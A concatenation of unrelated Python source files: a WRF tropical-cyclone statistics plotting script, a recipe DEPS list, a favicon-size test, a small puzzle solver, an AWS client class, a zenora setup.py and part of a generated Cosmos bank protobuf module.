#T_2m=np.mean(temp_pfile.variables["T_2m_daily"].get_value(),axis=0)[:,:]
F_up=np.mean(temp_pfile.variables["LW_u_monthly"].get_value(),axis=0)[:,:]+np.mean(temp_pfile.variables["SW_u_monthly"].get_value(),axis=0)[:,:]
F_down=np.mean(temp_pfile.variables["LW_d_monthly"].get_value(),axis=0)[:,:]+np.mean(temp_pfile.variables["SW_d_monthly"].get_value(),axis=0)[:,:]
#P_sfc=np.mean(temp_pfile.variables["p_sfc_monthly"].get_value(),axis=0)[:,:]
#V_sfc=np.sqrt(np.mean(temp_tfile.variables["UBOT"].get_value(),axis=0)[:,:]**2+np.mean(temp_tfile.variables["VBOT"].get_value(),axis=0)[:,:]**2)
for i in range(2,13):
if i<10: month="0"+str(i)
else: month=str(i)
temp_pfile=Nio.open_file(data_dir %(case,year) + post_file %(case,year,month))
T_sfc+=np.mean(temp_pfile.variables["T_sfc_monthly"].get_value(),axis=0)[:,:]
LH+=np.mean(temp_pfile.variables["LH_monthly"].get_value(),axis=0)[:,:]
#T_2m+=np.mean(temp_pfile.variables["T_2m_daily"].get_value(),axis=0)[:,:]
F_up+=np.mean(temp_pfile.variables["LW_u_monthly"].get_value(),axis=0)[:,:]+np.mean(temp_pfile.variables["SW_u_monthly"].get_value(),axis=0)[:,:]
F_down+=np.mean(temp_pfile.variables["LW_d_monthly"].get_value(),axis=0)[:,:]+np.mean(temp_pfile.variables["SW_d_monthly"].get_value(),axis=0)[:,:]
#P_sfc+=np.mean(temp_pfile.variables["p_sfc_monthly"].get_value(),axis=0)[:,:]
T_sfc[:,:]=T_sfc[:,:]/12.0
F_down[:,:]=F_down[:,:]/12.0
F_up[:,:]=F_up[:,:]/12.0
#P_sfc[:,:]=P_sfc[:,:]/12.0
LH[:,:]=LH[:,:]/12.0
#T_2m[:,:]=T_2m/12.0
#return (T_sfc[:,:]-T_200[:,:])/T_sfc[:,:]*LH[:,:]
#return (T_sfc[:,:]-T_200[:,:])/T_sfc[:,:]*(T_sfc[:,:]-T_2m[:,:])
#return (T_sfc[:,:]-T_200[:,:])/(P_sfc[:,:]*V_sfc[:,:])*(F_down[:,:]-F_up[:,:])
return (T_sfc[:,:]-T_200[:,:])/T_200[:,:]*(F_down[:,:]-F_up[:,:]+LH[:,:])
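# Note (added comment, hedged): the returned field is a simplified potential-intensity
# style proxy, (T_sfc - T_200) / T_200 multiplied by the net surface energy input
# (downward minus upward radiation plus latent heat flux), averaged over the 12 months.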
def get_lat_lon(case,year):
data_dir="~/PROJ_WRF/%s/%s/"
post_file="wrfpost_%s_%s_%s.nc"
tstorms_file="wrf_tstorms_%s_%s.nc"
temp_pfile=Nio.open_file(data_dir %(case,year) + post_file %(case,year,"01"))
lat=temp_pfile.variables["lat"].get_value()[:]
lon=temp_pfile.variables["lon"].get_value()[:]
return lat,lon
def get_PI_chunk(case,start,end):
PI_tmp=get_PI_year(case,start)
for i in range(start+1,end+1):
PI_tmp+=get_PI_year(case,i)
return PI_tmp[:,:]/float(end-start+1)
def get_PI_frac(PI_ctrl,PI_forced):
#return PI_forced[:,:]/PI_ctrl[:,:]-1.0
return np.sqrt(PI_forced[:,:]/PI_ctrl[:,:])-1.0
def plot_num_fig(tcfilename1,tcfilename2,start_year,end_year,
min_lat,max_lat,lat_res,min_lon,max_lon,lon_res,
min_wind,max_wind,wind_res,min_press,max_press,press_res,
dur_days,min_pdi,max_pdi,pdi_res,min_ace,max_ace,ace_res,
outer_grid=gridspec.GridSpec(1,1,wspace=0.0,hspace=0.0)[0],
fig=plt.figure(1), title=None):
[months,monthly_num,
years,yearly_num,
lats,lat_num,
lons,lon_num,
intsys,intsy_num,
press,pres_num,
durs,wdurd_num,
pdurd_num,
pdis,pdi_num,
aces,ace_num] = get_all_diags(tcfilename1,start_year,end_year,
min_lat,max_lat,lat_res,
min_lon,max_lon,lon_res,
min_wind,max_wind,wind_res,
min_press,max_press,press_res,
dur_days,min_pdi,max_pdi,pdi_res,
min_ace,max_ace,ace_res)
[months,monthly_num2,
years,yearly_num2,
lats,lat_num2,
lons,lon_num2,
intsys,intsy_num2,
press,pres_num2,
durs,wdurd_num2,
pdurd_num2,
pdis,pdi_num2,
aces,ace_num2] = get_all_diags(tcfilename2,start_year,end_year,
min_lat,max_lat,lat_res,
min_lon,max_lon,lon_res,
min_wind,max_wind,wind_res,
min_press,max_press,press_res,
dur_days,min_pdi,max_pdi,pdi_res,
min_ace,max_ace,ace_res)
#----------------plotting---------------------#
fig_rows=5
fig_cols=2
plt.rc('font',size=7)
plt.rc('axes', titlesize=7)
inner_grid = gridspec.GridSpecFromSubplotSpec(fig_rows, fig_cols,
subplot_spec=outer_grid, wspace=0.6, hspace=0.9)
if title: fig.suptitle(title)
ax = plt.Subplot(fig,inner_grid[0])
#ax.bar(months,monthly_num,1,align='center')
l1,l2=ax.plot(months,monthly_num/np.sum(monthly_num),'r',months,monthly_num2/np.sum(monthly_num2),'b')
fig.add_subplot(ax)
#plt.annotate(r'$\mu=$'+str(avg_hori(months,monthly_num)), \
# xy=(0.05,0.75),xycoords='axes fraction')
plt.title("Month")
plt.xlim([1,12])
ax = plt.Subplot(fig,inner_grid[1])
#ax.bar(years,yearly_num,1,align='center')
ax.plot(years,yearly_num,'r',years,yearly_num2,'b')
fig.add_subplot(ax)
#plt.annotate(r'$\mu_{num}=$'+str(avg_vert(years,yearly_num)), \
# xy=(0.05,0.75),xycoords='axes fraction')
#plt.annotate(r'$\mu_{year}=$'+str(avg_hori(years,yearly_num)), \
# xy=(0.05,0.55),xycoords='axes fraction')
plt.title("Year")
plt.xlim([start_year,end_year])
ax = plt.Subplot(fig,inner_grid[2])
#ax.bar(lats,lat_num,lat_res,align='center')
ax.plot(lats,lat_num/np.sum(lat_num),'r',lats,lat_num2/np.sum(lat_num2),'b')
fig.add_subplot(ax)
#plt.annotate(r'$\mu=$'+str(avg_hori(lats,lat_num)), \
# xy=(0.05,0.75),xycoords='axes fraction')
plt.title("Latitude")
plt.xlim([min_lat,max_lat])
ax = plt.Subplot(fig,inner_grid[3])
#ax.bar(lons,lon_num,lon_res,align='center')
ax.plot(lons,lon_num/np.sum(lon_num),'r',lons,lon_num2/np.sum(lon_num2),'b')
fig.add_subplot(ax)
#plt.annotate(r'$\mu=$'+str(avg_hori(lons,lon_num)), \
# xy=(0.05,0.75),xycoords='axes fraction')
plt.title("Longitude")
plt.xlim([min_lon,max_lon])
ax = plt.Subplot(fig,inner_grid[4])
#ax.bar(intsys,intsy_num,int((max_wind-min_wind)/len(intsys)),align='center')
ax.plot(intsys,intsy_num/np.sum(intsy_num),'r',intsys,intsy_num2/np.sum(intsy_num2),'b')
fig.add_subplot(ax)
#plt.annotate(r'$\mu=$'+str(avg_hori(intsys,intsy_num)), \
# xy=(0.05,0.75),xycoords='axes fraction')
plt.title("Wind Speed (m/s)")
plt.xlim([min_wind,max_wind])
ax = plt.Subplot(fig,inner_grid[5])
#ax.bar(press,pres_num,int((max_press-min_press)/len(press)),align='center')
ax.plot(press[::-1],pres_num[::-1]/np.sum(pres_num[::-1]),'r',press[::-1],pres_num2[::-1]/np.sum(pres_num2[::-1]),'b')
fig.add_subplot(ax)
#plt.annotate(r'$\mu=$'+str(avg_hori(press,pres_num)), \
# xy=(0.05,0.75),xycoords='axes fraction')
plt.title("Pressure (mb)")
plt.xlim([min_press,max_press])
ax = plt.Subplot(fig,inner_grid[6])
#ax.bar(durs,wdurd_num,6,align='center')
ax.plot(durs,wdurd_num/np.sum(wdurd_num),'r',durs,wdurd_num2/np.sum(wdurd_num2),'b')
fig.add_subplot(ax)
#plt.annotate(r'$\mu=$'+str(avg_hori(durs,wdurd_num)), \
# xy=(0.05,0.75),xycoords='axes fraction')
plt.title("Wind Life (hrs)")
plt.xlim([0,6*len(wdurd_num)])
ax = plt.Subplot(fig,inner_grid[7])
#ax.bar(durs,pdurd_num,6,align='center')
ax.plot(durs,pdurd_num/np.sum(pdurd_num),'r',durs,pdurd_num2/np.sum(pdurd_num2),'b')
fig.add_subplot(ax)
#plt.annotate(r'$\mu=$'+str(avg_hori(durs,pdurd_num)), \
# xy=(0.05,0.75),xycoords='axes fraction')
plt.title("Press Life (hrs)")
plt.xlim([0,6*len(pdurd_num)])
ax = plt.Subplot(fig,inner_grid[8])
ax.plot(pdis,pdi_num/np.sum(pdi_num),'r',pdis,pdi_num2/np.sum(pdi_num2),'b')
fig.add_subplot(ax)
plt.title("PDI ($m^3/s^2$)")
plt.xlim([min_pdi,max_pdi-5*pdi_res])
plt.ticklabel_format(axis="x", style="sci", scilimits=(0,0))
ax = plt.Subplot(fig,inner_grid[9])
ax.plot(aces,ace_num/np.sum(ace_num),'r',aces,ace_num2/np.sum(ace_num2),'b')
fig.add_subplot(ax)
plt.title("ACE ($m^2/s^2$)")
plt.xlim([min_ace,max_ace-5*ace_res])
#plt.ticklabel_format(axis="x", style="sci", scilimits=(0,0))
fig.legend((l1,l2),('ERAI','IBTrACS'),'upper left')
print("ERAI")
print("month avg: %s" %(avg_hori(months,monthly_num)))
print("yearly num avg: %s" %(avg_vert(years,yearly_num)))
print("lat avg: %s" %(avg_hori(lats,lat_num)))
print("lon avg: %s" %(avg_hori(lons,lon_num)))
print("max wind avg: %s" %(avg_hori(intsys,intsy_num)))
print("min press avg: %s" %(avg_hori(press,pres_num)))
print("w-life avg: %s" %(avg_hori(durs,wdurd_num)))
print("p-life avg: %s" %(avg_hori(durs,pdurd_num)))
print("pdi avg: %s" %(avg_hori(pdis,pdi_num)))
print("ace avg: %s" %(avg_hori(aces,ace_num)))
print("IBTRACS")
print("month avg: %s" %(avg_hori(months,monthly_num2)))
print("yearly num avg: %s" %(avg_vert(years,yearly_num2)))
print("lat avg: %s" %(avg_hori(lats,lat_num2)))
print("lon avg: %s" %(avg_hori(lons,lon_num2)))
print("max wind avg: %s" %(avg_hori(intsys,intsy_num2)))
print("min press avg: %s" %(avg_hori(press,pres_num2)))
print("w-life avg: %s" %(avg_hori(durs,wdurd_num2)))
print("p-life avg: %s" %(avg_hori(durs,pdurd_num2)))
print("pdi avg: %s" %(avg_hori(pdis,pdi_num2)))
print("ace avg: %s" %(avg_hori(aces,ace_num2)))
return fig
def plot_pval_fig(tcfilename1,tcfilename2,start_year,end_year,year_avg,ref_syear,
ref_eyear, min_lat,max_lat,lat_res,min_lon,max_lon,lon_res,
min_wind,max_wind,wind_res,min_press,max_press,press_res,
dur_days,
outer_grid=gridspec.GridSpec(1,1,wspace=0.0,hspace=0.0)[0],
fig=plt.figure(1), title=None):
[months,monthly_num2,
years2,yearly_num2,
lats,lat_num2,
lons,lon_num2,
intsys,intsy_num2,
press,pres_num2,
durs,wdurd_num2,
pdurd_num2] = get_all_diags(tcfilename2,ref_syear,ref_eyear,
min_lat,max_lat,lat_res,
min_lon,max_lon,lon_res,
min_wind,max_wind,wind_res,
min_press,max_press,press_res,
dur_days)
pm_vals=[]
pw_vals=[]
plat_vals=[]
plon_vals=[]
pp_vals=[]
pwdur_vals=[]
ppdur_vals=[]
years=[]
year_range = end_year-start_year+1
for i in range(year_range):
calc_year = start_year+i
years.append(calc_year)
[start_idx,end_idx] = running_range(year_range,year_avg,i)
syr = start_idx+start_year
eyr = end_idx+start_year
[months,monthly_num1,
years1,yearly_num1,
lats,lat_num1,
lons,lon_num1,
intsys,intsy_num1,
press,pres_num1,
durs,wdurd_num1,
pdurd_num1] = get_all_diags(tcfilename1,syr,eyr,
min_lat,max_lat,lat_res,
min_lon,max_lon,lon_res,
min_wind,max_wind,wind_res,
min_press,max_press,press_res,
dur_days)
[ Pm, Pw, Plat, Plon,
Pp, Pwdur, Ppdur ] = get_all_ks_tests(monthly_num1,monthly_num2,
intsy_num1,intsy_num2,
lat_num1,lat_num2,
lon_num1,lon_num2,
pres_num1,pres_num2,
wdurd_num1,wdurd_num2,
pdurd_num1,pdurd_num2)
pm_vals.append(Pm)
pw_vals.append(Pw)
plat_vals.append(Plat)
plon_vals.append(Plon)
pp_vals.append(Pp)
pwdur_vals.append(Pwdur)
ppdur_vals.append(Ppdur)
#----------------plotting---------------------#
fig_rows=4
fig_cols=2
inner_grid = gridspec.GridSpecFromSubplotSpec(fig_rows, fig_cols,
subplot_spec=outer_grid, wspace=0.5, hspace=0.6)
#inner_grid.update(left=0.2,right=0.9,top=0.9,bottom=0.15)
# plt.subplots_adjust(top=0.9,bottom=0.15,left=0.20,right=0.90,hspace=1.0,wspace=0.7)
plt.rc('font',size=6)
plt.rc('axes', titlesize=7)
if title: plt.suptitle(title)
ax = plt.Subplot(fig,inner_grid[0])
ax.plot(years,pm_vals)
fig.add_subplot(ax)
plt.title("month")
plt.ylim(0.0,1.0)
ax = plt.Subplot(fig,inner_grid[1])
ax.plot(years,pw_vals)
fig.add_subplot(ax)
plt.title("wind")
plt.ylim(0.0,1.0)
ax = plt.Subplot(fig,inner_grid[2])
ax.plot(years,plat_vals)
fig.add_subplot(ax)
plt.title("lat")
plt.ylim(0.0,1.0)
ax = plt.Subplot(fig,inner_grid[3])
ax.plot(years,plon_vals)
fig.add_subplot(ax)
plt.title("lon")
plt.ylim(0.0,1.0)
ax = plt.Subplot(fig,inner_grid[4])
ax.plot(years,pp_vals)
fig.add_subplot(ax)
plt.title("press")
plt.ylim(0.0,1.0)
ax = plt.Subplot(fig,inner_grid[5])
ax.plot(years,pwdur_vals)
fig.add_subplot(ax)
plt.title("w-life")
plt.ylim(0.0,1.0)
ax = plt.Subplot(fig,inner_grid[6])
ax.plot(years,ppdur_vals)
fig.add_subplot(ax)
plt.title("p-life")
plt.ylim(0.0,1.0)
return fig
|
py | b414e8896223eb3642e2e405d6fca49f53432a03 | # Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
PYTHON_VERSION_COMPATIBILITY = "PY3"
DEPS = [
'recipe_engine/context',
'recipe_engine/file',
'recipe_engine/path',
'recipe_engine/step',
'run',
'vars',
]
|
py | b414e8ce7723ddb3ff16a92f2f7767be71312695 | from pyfavicon import Favicon
import pytest
GITLAB_FAVICONS = {
'https://about.gitlab.com/ico/favicon.ico': (-1, -1),
'https://about.gitlab.com/ico/favicon-192x192.png': (190, 175),
'https://about.gitlab.com/ico/favicon-160x160.png': (158, 145),
'https://about.gitlab.com/ico/favicon-96x96.png': (95, 87),
'https://about.gitlab.com/ico/favicon-16x16.png': (16, 14),
'https://about.gitlab.com/ico/favicon-32x32.png': (32, 29),
'https://about.gitlab.com/ico/apple-touch-icon-57x57.png': (57, 57),
'https://about.gitlab.com/ico/apple-touch-icon-114x114.png': (114, 114),
'https://about.gitlab.com/ico/apple-touch-icon-72x72.png': (72, 72),
'https://about.gitlab.com/ico/apple-touch-icon-144x144.png': (144, 144),
'https://about.gitlab.com/ico/apple-touch-icon-60x60.png': (60, 60),
'https://about.gitlab.com/ico/apple-touch-icon-120x120.png': (120, 120),
'https://about.gitlab.com/ico/apple-touch-icon-76x76.png': (76, 76),
'https://about.gitlab.com/ico/apple-touch-icon-152x152.png': (152, 152),
'https://about.gitlab.com/ico/apple-touch-icon-180x180.png': (180, 180),
'https://about.gitlab.com/ico/mstile-144x144.png': (144, 144)
}
favicon = Favicon()
@pytest.mark.asyncio
async def test_icon_size():
icons = await favicon.from_url('https://gitlab.com')
assert len(icons) != 0
for icon in icons:
assert GITLAB_FAVICONS[str(icon.link)] == icon.size
largest = icons.get_largest(extension='png')
assert largest.size == (190, 175)
assert largest.extension == 'png'
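# Note (assumption): this test performs a live HTTP request to gitlab.com, so it needs
# network access plus the pytest-asyncio plugin that provides the 'asyncio' marker.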
|
py | b414e8ea7977c874a186002bab8e5cfded1c4786 | import copy
text = [el for el in input()]
deepcopy_list = copy.deepcopy(text)
answer = []
previous_el = deepcopy_list[0]
to_add = 0
index = 0
while not deepcopy_list == []:
if previous_el == ">":
previous_el = deepcopy_list[0]
index -= 1
explosion = int(deepcopy_list[0])
if to_add > 0:
explosion += to_add
while not deepcopy_list[0] == ">":
deepcopy_list.pop(0)
explosion -= 1
if explosion == 0:
break
if deepcopy_list == []:
break
if explosion > 0:
to_add += explosion
else:
answer.append(deepcopy_list[0])
deepcopy_list.remove(deepcopy_list[0])
previous_el = answer[index]
index += 1
print("".join(answer))
|
py | b414ea68c975064cc09e00952a9eca95982e5f92 | from typing import Union, Optional
from mason.clients.base import Client
from mason.engines.metastore.models.credentials import InvalidCredentials
from mason.engines.metastore.models.credentials.aws import AWSCredentials
class AWSClient(Client):
def __init__(self, access_key: str, secret_key: str, aws_region: str, aws_role_arn: Optional[str] = None):
self.access_key = access_key
self.secret_key = secret_key
self.aws_region = aws_region
self.aws_role_arn = aws_role_arn
def to_dict(self) -> dict:
return {
"client_name": super().name(),
"access_key": "REDACTED",
"secret_key": "REDACTED",
"aws_region": self.aws_region,
"aws_role_arn": self.aws_role_arn
}
def credentials(self) -> Union[AWSCredentials, InvalidCredentials]:
if self.access_key and self.secret_key:
return AWSCredentials(self.access_key, self.secret_key)
else:
return InvalidCredentials("AWS Credentials Undefined.")
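# Usage sketch (illustrative; the key strings are placeholders):
#   client = AWSClient(access_key="AKIA...", secret_key="...", aws_region="us-east-1")
#   creds = client.credentials()  # AWSCredentials when both keys are set,
#                                 # otherwise InvalidCredentials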
|
py | b414eab6969443613bc335e0f9e7e8e5e651f6ed | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="zenora",
version="0.0.20",
author="K.M Ahnaf Zamil",
author_email="[email protected]",
description="A modern Discord REST API wrapper that allows you to access the data without running a bot.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/ahnaf-zamil/zenora",
packages=["zenora", "zenora.impl", "zenora.base", "zenora.utils"],
install_requires=[
"attrs",
"requests",
"typing",
],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires=">=3.6",
) |
py | b414ebd835919000f4372d9dddb2b2453a2b445f | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: cosmos/bank/v1beta1/query.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from cosmos.base.query.v1beta1 import pagination_pb2 as cosmos_dot_base_dot_query_dot_v1beta1_dot_pagination__pb2
from gogoproto import gogo_pb2 as gogoproto_dot_gogo__pb2
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
from cosmos.base.v1beta1 import coin_pb2 as cosmos_dot_base_dot_v1beta1_dot_coin__pb2
from cosmos.bank.v1beta1 import bank_pb2 as cosmos_dot_bank_dot_v1beta1_dot_bank__pb2
from cosmos_proto import cosmos_pb2 as cosmos__proto_dot_cosmos__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='cosmos/bank/v1beta1/query.proto',
package='cosmos.bank.v1beta1',
syntax='proto3',
serialized_options=b'Z)github.com/cosmos/cosmos-sdk/x/bank/types',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\x1f\x63osmos/bank/v1beta1/query.proto\x12\x13\x63osmos.bank.v1beta1\x1a*cosmos/base/query/v1beta1/pagination.proto\x1a\x14gogoproto/gogo.proto\x1a\x1cgoogle/api/annotations.proto\x1a\x1e\x63osmos/base/v1beta1/coin.proto\x1a\x1e\x63osmos/bank/v1beta1/bank.proto\x1a\x19\x63osmos_proto/cosmos.proto\"Y\n\x13QueryBalanceRequest\x12)\n\x07\x61\x64\x64ress\x18\x01 \x01(\tB\x18\xd2\xb4-\x14\x63osmos.AddressString\x12\r\n\x05\x64\x65nom\x18\x02 \x01(\t:\x08\xe8\xa0\x1f\x00\x88\xa0\x1f\x00\"B\n\x14QueryBalanceResponse\x12*\n\x07\x62\x61lance\x18\x01 \x01(\x0b\x32\x19.cosmos.base.v1beta1.Coin\"\x8a\x01\n\x17QueryAllBalancesRequest\x12)\n\x07\x61\x64\x64ress\x18\x01 \x01(\tB\x18\xd2\xb4-\x14\x63osmos.AddressString\x12:\n\npagination\x18\x02 \x01(\x0b\x32&.cosmos.base.query.v1beta1.PageRequest:\x08\xe8\xa0\x1f\x00\x88\xa0\x1f\x00\"\xb6\x01\n\x18QueryAllBalancesResponse\x12]\n\x08\x62\x61lances\x18\x01 \x03(\x0b\x32\x19.cosmos.base.v1beta1.CoinB0\xc8\xde\x1f\x00\xaa\xdf\x1f(github.com/cosmos/cosmos-sdk/types.Coins\x12;\n\npagination\x18\x02 \x01(\x0b\x32\'.cosmos.base.query.v1beta1.PageResponse\"_\n\x17QueryTotalSupplyRequest\x12:\n\npagination\x18\x01 \x01(\x0b\x32&.cosmos.base.query.v1beta1.PageRequest:\x08\xe8\xa0\x1f\x00\x88\xa0\x1f\x00\"\xb4\x01\n\x18QueryTotalSupplyResponse\x12[\n\x06supply\x18\x01 \x03(\x0b\x32\x19.cosmos.base.v1beta1.CoinB0\xc8\xde\x1f\x00\xaa\xdf\x1f(github.com/cosmos/cosmos-sdk/types.Coins\x12;\n\npagination\x18\x02 \x01(\x0b\x32\'.cosmos.base.query.v1beta1.PageResponse\"%\n\x14QuerySupplyOfRequest\x12\r\n\x05\x64\x65nom\x18\x01 \x01(\t\"H\n\x15QuerySupplyOfResponse\x12/\n\x06\x61mount\x18\x01 \x01(\x0b\x32\x19.cosmos.base.v1beta1.CoinB\x04\xc8\xde\x1f\x00\"\x14\n\x12QueryParamsRequest\"H\n\x13QueryParamsResponse\x12\x31\n\x06params\x18\x01 \x01(\x0b\x32\x1b.cosmos.bank.v1beta1.ParamsB\x04\xc8\xde\x1f\x00\"X\n\x1aQueryDenomsMetadataRequest\x12:\n\npagination\x18\x01 \x01(\x0b\x32&.cosmos.base.query.v1beta1.PageRequest\"\x92\x01\n\x1bQueryDenomsMetadataResponse\x12\x36\n\tmetadatas\x18\x01 \x03(\x0b\x32\x1d.cosmos.bank.v1beta1.MetadataB\x04\xc8\xde\x1f\x00\x12;\n\npagination\x18\x02 \x01(\x0b\x32\'.cosmos.base.query.v1beta1.PageResponse\"*\n\x19QueryDenomMetadataRequest\x12\r\n\x05\x64\x65nom\x18\x01 \x01(\t\"S\n\x1aQueryDenomMetadataResponse\x12\x35\n\x08metadata\x18\x01 \x01(\x0b\x32\x1d.cosmos.bank.v1beta1.MetadataB\x04\xc8\xde\x1f\x00\"d\n\x17QueryDenomOwnersRequest\x12\r\n\x05\x64\x65nom\x18\x01 \x01(\t\x12:\n\npagination\x18\x02 \x01(\x0b\x32&.cosmos.base.query.v1beta1.PageRequest\"i\n\nDenomOwner\x12)\n\x07\x61\x64\x64ress\x18\x01 \x01(\tB\x18\xd2\xb4-\x14\x63osmos.AddressString\x12\x30\n\x07\x62\x61lance\x18\x02 \x01(\x0b\x32\x19.cosmos.base.v1beta1.CoinB\x04\xc8\xde\x1f\x00\"\x8e\x01\n\x18QueryDenomOwnersResponse\x12\x35\n\x0c\x64\x65nom_owners\x18\x01 \x03(\x0b\x32\x1f.cosmos.bank.v1beta1.DenomOwner\x12;\n\npagination\x18\x02 
\x01(\x0b\x32\'.cosmos.base.query.v1beta1.PageResponse2\xd3\t\n\x05Query\x12\x98\x01\n\x07\x42\x61lance\x12(.cosmos.bank.v1beta1.QueryBalanceRequest\x1a).cosmos.bank.v1beta1.QueryBalanceResponse\"8\x82\xd3\xe4\x93\x02\x32\x12\x30/cosmos/bank/v1beta1/balances/{address}/by_denom\x12\x9b\x01\n\x0b\x41llBalances\x12,.cosmos.bank.v1beta1.QueryAllBalancesRequest\x1a-.cosmos.bank.v1beta1.QueryAllBalancesResponse\"/\x82\xd3\xe4\x93\x02)\x12\'/cosmos/bank/v1beta1/balances/{address}\x12\x8f\x01\n\x0bTotalSupply\x12,.cosmos.bank.v1beta1.QueryTotalSupplyRequest\x1a-.cosmos.bank.v1beta1.QueryTotalSupplyResponse\"#\x82\xd3\xe4\x93\x02\x1d\x12\x1b/cosmos/bank/v1beta1/supply\x12\x8e\x01\n\x08SupplyOf\x12).cosmos.bank.v1beta1.QuerySupplyOfRequest\x1a*.cosmos.bank.v1beta1.QuerySupplyOfResponse\"+\x82\xd3\xe4\x93\x02%\x12#/cosmos/bank/v1beta1/supply/{denom}\x12\x80\x01\n\x06Params\x12\'.cosmos.bank.v1beta1.QueryParamsRequest\x1a(.cosmos.bank.v1beta1.QueryParamsResponse\"#\x82\xd3\xe4\x93\x02\x1d\x12\x1b/cosmos/bank/v1beta1/params\x12\xa6\x01\n\rDenomMetadata\x12..cosmos.bank.v1beta1.QueryDenomMetadataRequest\x1a/.cosmos.bank.v1beta1.QueryDenomMetadataResponse\"4\x82\xd3\xe4\x93\x02.\x12,/cosmos/bank/v1beta1/denoms_metadata/{denom}\x12\xa1\x01\n\x0e\x44\x65nomsMetadata\x12/.cosmos.bank.v1beta1.QueryDenomsMetadataRequest\x1a\x30.cosmos.bank.v1beta1.QueryDenomsMetadataResponse\",\x82\xd3\xe4\x93\x02&\x12$/cosmos/bank/v1beta1/denoms_metadata\x12\x9d\x01\n\x0b\x44\x65nomOwners\x12,.cosmos.bank.v1beta1.QueryDenomOwnersRequest\x1a-.cosmos.bank.v1beta1.QueryDenomOwnersResponse\"1\x82\xd3\xe4\x93\x02+\x12)/cosmos/bank/v1beta1/denom_owners/{denom}B+Z)github.com/cosmos/cosmos-sdk/x/bank/typesb\x06proto3'
,
dependencies=[cosmos_dot_base_dot_query_dot_v1beta1_dot_pagination__pb2.DESCRIPTOR,gogoproto_dot_gogo__pb2.DESCRIPTOR,google_dot_api_dot_annotations__pb2.DESCRIPTOR,cosmos_dot_base_dot_v1beta1_dot_coin__pb2.DESCRIPTOR,cosmos_dot_bank_dot_v1beta1_dot_bank__pb2.DESCRIPTOR,cosmos__proto_dot_cosmos__pb2.DESCRIPTOR,])
_QUERYBALANCEREQUEST = _descriptor.Descriptor(
name='QueryBalanceRequest',
full_name='cosmos.bank.v1beta1.QueryBalanceRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='address', full_name='cosmos.bank.v1beta1.QueryBalanceRequest.address', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\322\264-\024cosmos.AddressString', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='denom', full_name='cosmos.bank.v1beta1.QueryBalanceRequest.denom', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'\350\240\037\000\210\240\037\000',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=243,
serialized_end=332,
)
_QUERYBALANCERESPONSE = _descriptor.Descriptor(
name='QueryBalanceResponse',
full_name='cosmos.bank.v1beta1.QueryBalanceResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='balance', full_name='cosmos.bank.v1beta1.QueryBalanceResponse.balance', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=334,
serialized_end=400,
)
_QUERYALLBALANCESREQUEST = _descriptor.Descriptor(
name='QueryAllBalancesRequest',
full_name='cosmos.bank.v1beta1.QueryAllBalancesRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='address', full_name='cosmos.bank.v1beta1.QueryAllBalancesRequest.address', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\322\264-\024cosmos.AddressString', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pagination', full_name='cosmos.bank.v1beta1.QueryAllBalancesRequest.pagination', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'\350\240\037\000\210\240\037\000',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=403,
serialized_end=541,
)
_QUERYALLBALANCESRESPONSE = _descriptor.Descriptor(
name='QueryAllBalancesResponse',
full_name='cosmos.bank.v1beta1.QueryAllBalancesResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='balances', full_name='cosmos.bank.v1beta1.QueryAllBalancesResponse.balances', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
